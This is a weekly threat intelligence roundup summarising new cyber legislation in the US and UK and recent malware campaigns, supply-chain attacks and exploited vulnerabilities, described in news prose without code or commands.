Cyware Weekly Threat Intelligence, November 24–28, 2025

The Good

Governments are sharpening their legislative teeth this week, introducing aggressive new laws to combat the dual threats of AI-driven deception and crumbling cyber defenses. In the U.S., the new AI Fraud Deterrence Act proposes massive penalties for offenders who weaponize AI, including prison sentences of up to 30 years and fines reaching $2 million for utilizing fake audio or video in financial crimes. Across the Atlantic, the U.K has introduced the Cyber Security and Resilience Bill to counter a 130% surge in significant cyber incidents, mandating strictly tighter reporting windows.

1. A new bipartisan bill, the AI Fraud Deterrence Act, aims to combat the increasing use of AI in fraud and impersonation. The legislation proposes significant increases in criminal penalties for those using AI tools to create convincing fake audio, video, or texts. Fines for various fraud types could rise to between $1-2 million, with maximum prison sentences extending to 20-30 years for offenders. The bill specifically addresses the alarming trend of scammers impersonating government officials, with penalties of up to $1 million and three years in prison for such actions. This initiative responds to a series of high-profile incidents involving AI-generated impersonations that pose serious risks to both individuals and national security.

2. The UK Cyber Resilience Bill aims to enhance national security in response to a 130% rise in significant cyber incidents in 2025. Introduced in Parliament, the bill seeks to address gaps in existing regulations by expanding its regulatory scope to include data centers, managed service providers, and large load controllers. It mandates that operators of essential services report incidents within 24 hours and provide comprehensive reports within 72 hours, improving the current incident reporting framework. Additionally, the bill strengthens regulatory powers, allowing for targeted actions against national security threats and introducing higher penalties for non-compliance. 

The Bad

The Bloody Wolf hacking group has intensified its campaigns in Kyrgyzstan and Uzbekistan, using spear-phishing to deliver the outdated but effective NetSupport RAT. RomCom has teamed up with the SocGholish cybercrime network to target a civil engineering firm using fake browser update alerts. This marks the first time RomCom's sophisticated Mythic Agent malware has been delivered through this common fake update infection route. A massive supply chain attack is turning trusted developer tools into weapons. The Shai-Hulud malware has compromised over 500 npm packages, including libraries for Zapier and PostHog.

1. Bloody Wolf, a hacking group, has intensified its cyberattack campaign in Kyrgyzstan and Uzbekistan since mid-2025, primarily targeting the finance, government, and IT sectors. Utilizing spear-phishing tactics, the group impersonates trusted government ministries to distribute malicious JAR files disguised as official documents. Once downloaded, these files execute a loader that fetches the NetSupport RAT payload, establishing persistence on the infected systems. Notably, the campaign in Uzbekistan incorporates geofencing, redirecting external requests to legitimate sites while delivering malware to local users. The attackers employ outdated tools, such as Java 8 and an older version of NetSupport Manager from 2013.

2. RomCom, a Russia-aligned malware group, has targeted a U.S.-based civil engineering company using SocGholish fake update attacks to deliver the Mythic Agent malware. This attack marks the first instance of RomCom payloads being distributed through SocGholish, which serves as an initial access broker by tricking users into downloading malicious JavaScript via fake browser update alerts. The threat actors behind SocGholish, linked to financially motivated groups, exploit vulnerabilities in compromised websites to initiate infections. In this case, the attack involved a rapid infection timeline of under 30 minutes, culminating in the establishment of a reverse shell and the deployment of a custom Python backdoor. 

3. The CISA issued a warning about ongoing spyware campaigns that target users of mobile messaging applications like Signal and WhatsApp. These campaigns utilize sophisticated social engineering techniques and exploit vulnerabilities to gain unauthorized access to user accounts. Notable examples include Russia-aligned threat actors hijacking Signal accounts through its linked devices feature, as well as Android spyware campaigns impersonating popular apps to deliver malware. Additionally, targeted attacks have exploited security flaws in iOS and Samsung devices to compromise fewer than 200 WhatsApp users. CISA emphasizes that these threats primarily focus on high-value individuals, including current and former government officials, military personnel, and civil society members across the U.S., the Middle East, and Europe.

4. Shai-Hulud malware has compromised over 500 npm packages in a recent supply-chain attack, targeting well-known tools like Zapier and PostHog to steal developer and CI/CD secrets. The malware modifies legitimate packages by injecting malicious scripts and publishes them on npm using compromised maintainer accounts. Researchers have identified around 350 unique accounts involved in this campaign, which has resulted in the automatic creation of thousands of repositories on GitHub, where stolen secrets are leaked. The malware employs advanced obfuscation techniques and includes destructive payloads that can overwrite a victim's home directory under certain conditions.

New Threats

A Mirai-based malware named ShadowV2 used the chaos of the recent AWS downtime to conduct a "test run" on vulnerable IoT devices. This opportunistic attack exploited known flaws in EoL devices to build a DDoS-capable botnet. A malware campaign dubbed FlexibleFerret is targeting macOS devices with a Go-based backdoor that mimics Chrome permission prompts to steal credentials. A new MaaS platform called Matrix Push C2 is using browser alerts to launch fileless phishing attacks across different operating systems. By mimicking legitimate system warnings or login alerts, attackers can trick users into clicking malicious links.

1. A new Mirai-based botnet malware, named ShadowV2, has emerged, targeting IoT devices from vendors like D-Link and TP-Link by exploiting known vulnerabilities. Observed during the significant AWS outage in October, ShadowV2 appeared to conduct test runs, leveraging at least eight vulnerabilities, including critical flaws in D-Link devices that will not receive fixes due to their end-of-life status. The attacks, originating from a specific IP address, affected various sectors globally, including government and education. ShadowV2 is delivered through a downloader script and supports DDoS attacks across multiple protocols. Its C2 infrastructure facilitates these attacks, although the identity of the perpetrators and their monetization strategy remain unknown. 

2. A new malware campaign named FlexibleFerret has emerged, specifically targeting macOS systems. This sophisticated threat utilizes staged scripts and a persistent Go-based backdoor to bypass user safeguards and maintain long-term access to compromised devices. The malware employs a second-stage shell script that adapts its actions based on the system architecture, downloading various payloads accordingly. It masquerades as Chrome permission prompts to harvest user credentials, routing stolen data to a Dropbox account while avoiding detection through clever obfuscation techniques. The backdoor, known as CDrivers, facilitates numerous malicious tasks, including system information collection, file management, and automated credential theft. 

3. Kimsuky has launched an advanced campaign utilizing dual variants of the KimJongRAT malware. This operation begins with phishing emails that impersonate South Korean agencies, delivering malicious LNK files and decoy PDFs to unsuspecting victims. The malware can dynamically switch between Portable Executable (PE) and PowerShell payloads based on the status of Windows Defender, enhancing its stealth. Once deployed, the malware conducts extensive data theft, including browser credentials, cryptocurrency wallet information, and system data. Additionally, Kimsuky has established phishing sites that mimic legitimate South Korean services, allowing them to capture login credentials without detection. 

4. A recently discovered vulnerability in Microsoft Windows Server Update Services (WSUS), identified as CVE-2025-59287, has been actively exploited by threat actors to distribute ShadowPad malware. This modular backdoor, associated with Chinese state-sponsored hacking groups, allows attackers to gain full system access by executing remote code with system privileges. The exploitation process involves using legitimate Windows utilities like PowerCat, certutil, and curl to download and install ShadowPad after initially breaching the system. ShadowPad employs DLL side-loading techniques, leveraging a legitimate binary to execute malicious payloads while incorporating various anti-detection methods.

5. Matrix Push C2 is a new C2 platform that utilizes browser notifications for fileless, cross-platform phishing attacks. By tricking users into allowing notifications through social engineering tactics, attackers can send alerts that appear to originate from the operating system or browser. These notifications often mimic legitimate messages, such as suspicious login alerts, leading victims to click on malicious links. This innovative approach bypasses traditional security measures, creating a persistent communication channel with victims across various platforms. Offered as a malware-as-a-service, Matrix Push C2 is sold through crimeware channels, allowing attackers to customize their phishing campaigns with templates that impersonate well-known brands. Additionally, the platform provides tools for tracking victim interactions and analyzing the effectiveness of their attacks.